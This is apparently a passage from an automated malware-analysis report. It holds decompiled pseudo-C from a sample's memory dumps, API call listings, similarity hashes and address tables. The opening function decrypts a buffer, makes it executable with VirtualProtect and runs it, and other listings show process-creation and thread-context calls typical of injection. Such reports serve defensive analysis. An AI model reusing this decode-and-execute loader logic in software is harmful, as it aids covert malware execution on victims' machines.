                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000007 | ( *0x6f727fe8 & 0x000000ff) << 0x00000001;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0xcd;
                                                                                              						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^ 0x000000a5;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) -  *0x6f727360;
                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 =  ~( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^  *0x6f727360;
                                                                                              						_t123 =  *0x6f727360; // 0x13c5
                                                                                              						_t51 =  *0x6f727fe8; // 0x0
                                                                                              						 *((char*)( &E6F722000 + _t123)) = _t51;
                                                                                              						_t89 =  *0x6f727360; // 0x13c5
                                                                                              						 *0x6f727360 = _t89 + 1;
                                                                                              					}
                                                                                              					VirtualProtect( &E6F722000, 0x13c5, 0x40, 0x6f727fe4);
                                                                                              					E6F722000(); // executed
                                                                                              					return 0;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}












                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,VirtualProtect), ref: 6F70F540
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6F70F547
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,VirtualAlloc), ref: 6F70F55A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6F70F561
                                                                                              • VirtualAlloc.KERNEL32(00000000,11E1A300,00003000,00000004), ref: 6F70F578
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc$AllocVirtual
                                                                                              • String ID: VirtualAlloc$VirtualProtect$kernel32.dll$kernel32.dll
                                                                                              • API String ID: 1786449878-3286849197
                                                                                              • Opcode ID: d98a243b14e000f678eabc7563dda6309fad6d324cb64c483da890eb2fd235b0
                                                                                              • Instruction ID: e044a537ff57c009549eb5773589b8792034aaab927d3123f174cd9412bc7a5d
                                                                                              • Opcode Fuzzy Hash: d98a243b14e000f678eabc7563dda6309fad6d324cb64c483da890eb2fd235b0
                                                                                              • Instruction Fuzzy Hash: ED91B75400DAE08BDB06E77947A2D603FA167EB23271860BFE5E5862C7CD2443E7DB25
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 6F72323F
                                                                                              • GetThreadContext.KERNEL32(?,00010007), ref: 6F723262
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ContextCreateProcessThread
                                                                                              • String ID: D
                                                                                              • API String ID: 2843130473-2746444292
                                                                                              • Opcode ID: 18645dc720baba6b035446a103f70195e793809c3327050073e32557ad5f88d5
                                                                                              • Instruction ID: 55c97a9ee829e8bb47d252beff7a680c97059f661817e2decf1dd4f87774a6b6
                                                                                              • Opcode Fuzzy Hash: 18645dc720baba6b035446a103f70195e793809c3327050073e32557ad5f88d5
                                                                                              • Instruction Fuzzy Hash: 9FA1E571E54209EFDB80DFA8CA85BAEBBF5BF09305F104469E515EB291D730AA41CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F722997
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 0d7919dc4beb76136a7a5fa3f881afd0abca99c410f216f4a75ed7b6ad1ee447
                                                                                              • Instruction ID: 71012fc81b350fc2b5fa975cdcc2c699a4e0b0f5cbfb710da6c1fe93d3fcf942
                                                                                              • Opcode Fuzzy Hash: 0d7919dc4beb76136a7a5fa3f881afd0abca99c410f216f4a75ed7b6ad1ee447
                                                                                              • Instruction Fuzzy Hash: C4714E35E54348EAEB50DBF4EA15BEDB7B5BF48710F20851AE618FA2E0E7704A40DB05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              C-Code - Quality: 24%
                                                                                              			E6F7099A7() {
                                                                                              				void* _t219;
                                                                                              				void* _t221;
                                                                                              				void* _t222;
                                                                                              
                                                                                              				L0:
                                                                                              				while(1) {
                                                                                              					L0:
                                                                                              					E6F710730( *(_t219 + 0xc), 0, ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c);
                                                                                              					_t222 = _t221 + 0xc;
                                                                                              					 *(_t219 + 0xc) =  *(_t219 + 0xc) + ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c;
                                                                                              					while(1) {
                                                                                              						L47:
                                                                                              						 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              						L1:
                                                                                              						while(( *( *(_t219 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                              							 *(_t219 - 0xc) =  *( *(_t219 + 0x10)) & 0x000000ff;
                                                                                              							 *(_t219 - 0xc) =  *(_t219 - 0xc) - 1;
                                                                                              							if( *(_t219 - 0xc) > 0xb8) {
                                                                                              								L46:
                                                                                              								0x6f700000("unhandled format %d\n",  *( *(_t219 + 0x10)) & 0x000000ff);
                                                                                              								_t222 = _t222 + 8;
                                                                                              								while(1) {
                                                                                              									L47:
                                                                                              									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              									goto L1;
                                                                                              								}
                                                                                              							}
                                                                                              							L3:
                                                                                              							_t15 =  *(_t219 - 0xc) + 0x6f709b24; // 0xcccccc0f
                                                                                              							switch( *((intOrPtr*)(( *_t15 & 0x000000ff) * 4 +  &M6F709AE0))) {
                                                                                              								case 0:
                                                                                              									L4:
                                                                                              									E6F70AFA0( *((intOrPtr*)(_t219 + 8)),  *(_t219 + 0xc), 1);
                                                                                              									_push( *(_t219 + 0xc));
                                                                                              									_push( *( *(_t219 + 0xc)) & 0x0000ffff);
                                                                                              									_push("byte=%d => %p\n");
                                                                                              									0x6f700000();
                                                                                              									_t222 = _t222 + 0x18;
                                                                                              									 *(_t219 + 0xc) =  &(( *(_t219 + 0xc))[0]);
                                                                                              									L47:
                                                                                              									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              									goto L1;
                                                                                              								case 1:
                                                                                              									L5:
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                              									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                              									_push("short=%d => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 2;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 2:
                                                                                              									L9:
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									__eax =  *( *(__ebp + 0xc));
                                                                                              									_push( *( *(__ebp + 0xc)));
                                                                                              									_push("long=%d => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 3:
                                                                                              									L12:
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__eax = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									asm("cvtss2sd xmm0, [eax]");
                                                                                              									__esp = __esp - 8;
                                                                                              									asm("movsd [esp], xmm0");
                                                                                              									_push("float=%f => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 0x10;
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 4:
                                                                                              									L13:
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									__eax =  *(__edx + 4);
                                                                                              									_push(__eax);
                                                                                              									__ecx =  *__edx;
                                                                                              									_push(__ecx);
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 8;
                                                                                              									_push(__eax);
                                                                                              									_push("longlong=%s => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 5:
                                                                                              									L14:
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__eax = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__esp = __esp - 8;
                                                                                              									asm("movsd xmm0, [eax]");
                                                                                              									asm("movsd [esp], xmm0");
                                                                                              									_push("double=%f => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 0x10;
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 8;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 6:
                                                                                              									L6:
                                                                                              									__edx = __ebp - 4;
                                                                                              									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                              									__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__edx =  *( *(__ebp + 0xc));
                                                                                              									_push( *( *(__ebp + 0xc)));
                                                                                              									_push("enum16=%d => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                              										_push(0x6f5);
                                                                                              										__eax =  *0x6f700000();
                                                                                              									}
                                                                                              									L8:
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 7:
                                                                                              									L15:
                                                                                              									 *(__ebp - 0x1c) = 0;
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									_push("pointer => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 8;
                                                                                              									__eax =  *(__ebp + 0x10);
                                                                                              									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                              										__edx =  *(__ebp + 0x10);
                                                                                              										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                              									}
                                                                                              									__eax =  *(__ebp + 0x14);
                                                                                              									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              									if(__ecx != 0x11) {
                                                                                              										 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                              										__eax = E6F7073D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                              									}
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									__ecx =  *(__eax + 4);
                                                                                              									 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                              									__edx =  *(__ebp + 8);
                                                                                              									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                              										__ecx =  *(__ebp + 0x14);
                                                                                              										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                              											 *(__ebp + 8) = E6F70AF00( *(__ebp + 8), 4);
                                                                                              										}
                                                                                              									} else {
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										__ecx =  *(__ebp + 8);
                                                                                              										__edx =  *(__ecx + 0x34);
                                                                                              										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                              										 *(__ebp - 0x1c) = 1;
                                                                                              									}
                                                                                              									_t101 = __ebp + 0x18; // 0x6f703c70
                                                                                              									__ecx =  *_t101 & 0x000000ff;
                                                                                              									__edx =  *(__ebp + 0x14);
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__ecx =  *( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									__eax =  *(__ebp - 0x20);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__eax = E6F70B580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *_t101 & 0x000000ff);
                                                                                              									if( *(__ebp - 0x1c) == 0) {
                                                                                              										L29:
                                                                                              										__edx =  *(__ebp + 0x10);
                                                                                              										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                              											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                              											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                              										} else {
                                                                                              											__ecx =  *(__ebp + 0x14);
                                                                                              											__ecx =  *(__ebp + 0x14) + 4;
                                                                                              											 *(__ebp + 0x14) = __ecx;
                                                                                              										}
                                                                                              										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              										while(1) {
                                                                                              											L47:
                                                                                              											 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              											goto L1;
                                                                                              										}
                                                                                              									} else {
                                                                                              										do {
                                                                                              											L24:
                                                                                              											__edx =  *(__ebp + 8);
                                                                                              											__eax =  *(__edx + 0x14);
                                                                                              											_push( *(__edx + 0x14));
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											__edx =  *( *(__ebp + 8));
                                                                                              											__eax =  *(__ebp + 8);
                                                                                              											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                              											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                              											_push("buffer=%d/%d\n");
                                                                                              											0x6f700000();
                                                                                              											__esp = __esp + 0xc;
                                                                                              											__edx =  *(__ebp + 8);
                                                                                              											__eax =  *( *(__ebp + 8));
                                                                                              											__ecx =  *(__eax + 8);
                                                                                              											__edx =  *(__ebp + 8);
                                                                                              											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                              											__eax =  *(__ebp + 8);
                                                                                              											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                              												__ecx =  *(__ebp + 8);
                                                                                              												__edx =  *( *(__ebp + 8));
                                                                                              												__eax =  *(__edx + 8);
                                                                                              												__ecx =  *(__ebp + 8);
                                                                                              												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                              												__edx =  *(__ebp + 8);
                                                                                              												 *(__edx + 4) =  *(__edx + 4) - __eax;
                                                                                              												_push( *(__edx + 4) - __eax);
                                                                                              												_push("buffer overflow %d bytes\n");
                                                                                              												0x6f700000();
                                                                                              												__esp = __esp + 8;
                                                                                              											}
                                                                                              											__edx = 0;
                                                                                              										} while (0 != 0);
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										__ecx =  *(__ebp + 8);
                                                                                              										__edx =  *(__ecx + 4);
                                                                                              										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										__ecx =  *(__ebp - 0x20);
                                                                                              										 *( *(__ebp + 8) + 4) = __ecx;
                                                                                              										__edx =  *(__ebp + 0x14);
                                                                                              										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											__eax = E6F70AF00( *(__ebp + 8), 4);
                                                                                              										}
                                                                                              										goto L29;
                                                                                              									}
                                                                                              								case 8:
                                                                                              									L33:
                                                                                              									__ecx =  *(__ebp - 0x10);
                                                                                              									__edx = __ebp + 0xc;
                                                                                              									__eax = E6F707480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 9:
                                                                                              									L34:
                                                                                              									__eax =  *(__ebp - 0x10);
                                                                                              									__ecx = __ebp + 0xc;
                                                                                              									__eax = E6F707480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0xa:
                                                                                              									L35:
                                                                                              									__edx =  *(__ebp - 0x10);
                                                                                              									__ebp + 0xc = E6F707480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0xb:
                                                                                              									goto L0;
                                                                                              								case 0xc:
                                                                                              									L36:
                                                                                              									1 = 1 << 0;
                                                                                              									__eax =  *(__ebp + 0x10);
                                                                                              									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                              									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                              									__eax =  *(__ebp + 0x10);
                                                                                              									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                              									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                              									__edx =  *(__ebp - 8);
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									 *(__ebp - 0x18) = E6F70E3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp - 0x18);
                                                                                              									_push( *(__ebp - 0x18));
                                                                                              									_push("embedded complex (size=%d) => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									__eax =  *(__ebp + 0x18) & 0x000000ff;
                                                                                              									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
                                                                                              										__ecx =  *(__ebp - 0x18);
                                                                                              										__edx =  *(__ebp + 0xc);
                                                                                              										__eax = E6F710730( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                              									}
                                                                                              									__eax =  *(__ebp - 8);
                                                                                              									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                              									__ecx =  *( *(__ebp - 8)) & 0x7f;
                                                                                              									__edx =  *(0x6f71b3d8 + __ecx * 4);
                                                                                              									 *(__ebp - 0x14) =  *(0x6f71b3d8 + __ecx * 4);
                                                                                              									if( *(__ebp - 0x14) == 0) {
                                                                                              										__edx =  *(__ebp - 8);
                                                                                              										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                              										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                              										_push("no unmarshaller for embedded type %02x\n");
                                                                                              										0x6f700000();
                                                                                              										__esp = __esp + 8;
                                                                                              									} else {
                                                                                              										__eax =  *(__ebp - 8);
                                                                                              										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                              										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                              											_push(0);
                                                                                              											__edx =  *(__ebp - 8);
                                                                                              											_push( *(__ebp - 8));
                                                                                              											__eax = __ebp + 0xc;
                                                                                              											_push(__ebp + 0xc);
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											_push( *(__ebp + 8));
                                                                                              											__eax =  *(__ebp - 0x14)();
                                                                                              										} else {
                                                                                              											_push(0);
                                                                                              											__edx =  *(__ebp - 8);
                                                                                              											_push( *(__ebp - 8));
                                                                                              											__eax =  *(__ebp + 0xc);
                                                                                              											_push( *(__ebp + 0xc));
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											_push( *(__ebp + 8));
                                                                                              											__eax =  *(__ebp - 0x14)();
                                                                                              										}
                                                                                              									}
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                              									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                              									goto L1;
                                                                                              								case 0xd:
                                                                                              									L45:
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0xe:
                                                                                              									L10:
                                                                                              									__edx = __ebp - 0x24;
                                                                                              									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8), __ebp - 0x24, 4);
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__edx =  *(__ebp - 0x24);
                                                                                              									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__edx =  *__ecx;
                                                                                              									_push( *__ecx);
                                                                                              									_push("int3264=%ld => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0xf:
                                                                                              									L11:
                                                                                              									__ecx = __ebp - 0x28;
                                                                                              									__edx =  *(__ebp + 8);
                                                                                              									E6F70AFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp - 0x28);
                                                                                              									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__ecx =  *( *(__ebp + 0xc));
                                                                                              									_push(__ecx);
                                                                                              									_push("uint3264=%ld => %p\n");
                                                                                              									0x6f700000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0x10:
                                                                                              									goto L46;
                                                                                              							}
                                                                                              						}
                                                                                              						return  *(_t219 + 0xc);
                                                                                              					}
                                                                                              				}
                                                                                              			}






                                                                                              0x6f7097ca
                                                                                              0x6f7097cf
                                                                                              0x6f7097d4
                                                                                              0x6f7097d9
                                                                                              0x6f7097dc
                                                                                              0x6f7097df
                                                                                              0x6f7097e2
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f70961b
                                                                                              0x6f70961d
                                                                                              0x6f709625
                                                                                              0x6f70962d
                                                                                              0x6f709631
                                                                                              0x6f709634
                                                                                              0x6f709636
                                                                                              0x6f709639
                                                                                              0x6f70963a
                                                                                              0x6f70963d
                                                                                              0x6f70963f
                                                                                              0x6f709640
                                                                                              0x6f709645
                                                                                              0x6f70964a
                                                                                              0x6f70964d
                                                                                              0x6f709656
                                                                                              0x6f709658
                                                                                              0x6f70965d
                                                                                              0x6f70965d
                                                                                              0x6f709663
                                                                                              0x6f709663
                                                                                              0x6f709666
                                                                                              0x6f709669
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f7097ea
                                                                                              0x6f7097ea
                                                                                              0x6f7097f1
                                                                                              0x6f7097f4
                                                                                              0x6f7097f5
                                                                                              0x6f7097fa
                                                                                              0x6f7097ff
                                                                                              0x6f709802
                                                                                              0x6f709805
                                                                                              0x6f70980b
                                                                                              0x6f70980d
                                                                                              0x6f709810
                                                                                              0x6f709810
                                                                                              0x6f709813
                                                                                              0x6f709816
                                                                                              0x6f70981c
                                                                                              0x6f709823
                                                                                              0x6f709827
